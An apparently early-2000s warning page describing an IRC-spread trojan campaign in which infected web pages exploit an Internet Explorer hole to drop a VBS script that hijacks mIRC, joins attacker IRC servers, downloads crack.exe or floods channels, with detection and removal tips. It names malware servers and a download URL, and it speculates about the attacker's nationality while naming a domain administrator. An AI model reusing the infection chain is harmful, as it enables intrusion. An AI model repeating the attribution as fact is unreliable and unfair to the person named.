Recently (at the beginning of januar 2002), a new wave of very malicious trojan horses has been spreading over the Internet. They all seem to have been created by a young Koweitian, but nothing is sure, since the hackers like scrambling the clues. These trojans propagate neither by E-mail, nor by conventional DCC Sends under IRC: their way of infection is pretty more clever and transparent.

How can I be infected?

By simply surfing over the Web! And that, because of a safety hole which is now well known, and which has now been fixed by Microsoft for more than one year. If you are used to visit websites that unknown persons on the IRC advertize for through private messages, you must be aware that you likely downloaded and executed a very malicious vbs script.

I have collected in this website some infected html pages that I found. Of course, these pages are inside this present site, and the malicious code has been withdrawn. If you already saw one of these pages (the list is not exhaustive), please read carefully the continuation...

Page on ayna.com (recently removed)

Page on geocities

Page on homepagez

Page on stormpages

What does this trojan do, and how does it work?

The mechanism of such a trojan is particularly clever: it works in 5 rounds:

1) You firstly receive an automatic invitation on the IRC to visit an infected website. You then decide to visit this site.

2) Once the webpage is downloaded, a javascript which is included in the source code writes onto your hard disk a .vbs file (Window Scripting Host language) and executes it. Yes this is unfortunately possible: javascript writing onto your hard disk! The infectious javascript uses a well known safety hole of Windows and Internet Explorer. This safety hole has been named JS.Exception.Exploit, and was discovered at the end of the year 2000. Most of you are still using Windows 98, and never thought to download security patches of Microsoft... Unfortunately, that is what the hacker has counted for. On the opposite, I think that WinXP users are safe.

3) Once executed by the javascript, the .vbs file, the code of which is pretty complicated, inserts a .ini file in your mirc folder. Moreover, it modifies mirc.ini so that this file is then taken into account by mirc. When launching mirc at the next time, the script can properly work.

4) When you connect to your regular server (an undernet server, as an example), the script is launched by the event ON CONNECT, and discreetly connects a socket without you suspecting it onto a koweitian irc server. The address of such a server depends on the virus: I have currently indexed two servers: irc.q8sharks.org and irc.alshab7.com . The ip address of your connection is evidently yours; then it joins a secret channel on this server, the name of which also depends on the virus you have got.

5) At this moment, the purpose of the scripts are different; I have indexed two kinds of script: the first one, that I have found to be particularly malicious, and that I have named Aladin, the second one, that I have named Alshab7. But I know that there are other kinds, unfortunately!

In any case, under the injunctions of the channel operator (probably the creator of the worm), the mirc script will control your actions and execute some tasks.

Aladin variant: the hacker will make you download and execute some exe applications available on the web, especially the file crack.exe of 618K which was recently available on http://home.dal.net/madlover/. (This website was closed on 25/01/02, by the complicity of a friend who has a strong influence on the Dalnet community). The mirc script contains all the commands in order to download binary files from the Web, using at this end sockets and binary variables. I really don't know what this file crack.exe is able to do on your computer!! Perhaps allowing ftp sessions on your hard disk, perhaps (more likely) turning you into one or more clonebots in order to attack some channels on any irc server by flooding them, without you to be aware of it. I recently counted, as an example, about 400 hacked connections in the channel under the server of Aladin, just when joined it. This script is very powerful!

Alshab7 variant: the script is unable to download files, yet it has been created in order to connect one or more sockets onto an irc server chosen by the hacker, and to flood channels, also chosen by him. The purpose of such a script is evidently to create an army of clones, all having various ip adresses (yours), and that, without the knowledge of the infected user.

How can I know if I am infected?

Firstly, I have created a web page to test your vulnerability to the safety hole. It voluntarily reproduces the trojan process, without causing any damage to your hard disk: it only will display a text in Notepad if it works. Your antivirus will perhaps detect a trojan and will then prevent you to download the page. If so, that is good!

Be careful anyway, since I have got some echoes as this web page could totally fuck up your operating system (blue screen), and particularly if you are using Norton Antivirus. You'll be aware!

To test your vulnerability, please click here

To know if you are already infected, there are more than one clue: firstly the script sends private messages ON JOIN and sometimes ON PART, advertizing for a webpage containing the malicious code. Secondly, for those who have unfortunately been victim of the Aladin variant, you should have a file named crack.exe in your mirc download folder. At the end, you should have an additional script in your mirc application, probably named server.ini, containing instructions related to socket connections. For those who are not used to script, type Alt-R, select the View menu, then look inside the popup to see the list of the current active scripts.

Just for information, I have reproduced hereafter the beginning of the code of the Aladin variant:

Fuck!! I have got one of these scripts!! What can I do?

No panic, please, but be careful anyway, since I have neither any clue of what could the file crack.exe do on your computer, nor of what the hacker could make you additionally download an execute, if you had got the Aladin variant. I can not insure you that your computer has not been visited, perhaps modified. I recently sent an E-mail to Symantec by sensitizing them about this trojan, giving them all the previously quoted urls. Hopefully they will quickly find a way to eradicate the effects of crack.exe. Moreover, if you know who I can speak about it to, please feel free to send me an E-mail. The only thing that I advise you to in any case, is firstly to unload the script ( /unload -rs server.ini ), then closing all you socket connections ( /sockclose * ).

Last news

I recently found a server realserver.q80.net port 3257 having an ircop named Aladin, and a channel #aladinizback fulfilled with hacked connections.

What seems to be sure is, that the same person likely wrote all of these malicious codes, since the servers on which the hacked users connect to, in any of these variants, have got domain names owned by the E-enterprise Kuwaitnet.

The irc server of the Aladin variant is indeed irc.q8sharks.org and the irc server of the alshab7 variant is irc.alshab7.com. These two domain names has been rented by a certain Bashar AlAbdulhadi, who is currently the administrator of the Kuwaitnet network.

I sent an E-mail to Aladbulhadi in order to inform him that the domains q8sharks.org and alshab7.com were rented (or hacked) in order to serve a hacker, and he promised me to "do the proper action". If he closes the previously quoted irc server, there is no more risk for the infected people.

It is now pretty sure that the hacker's nationality is koweitian, because he has chosen koweitian domain names, and he has used arabic web pages to infect people. Moreover, a friend of mine who helped me a lot in my enquiry recently discussed with the hacker: his computer clock gave a time corresponding to the koweitian time zone (French hour + 2h).

Real or false clues? This is to be followed....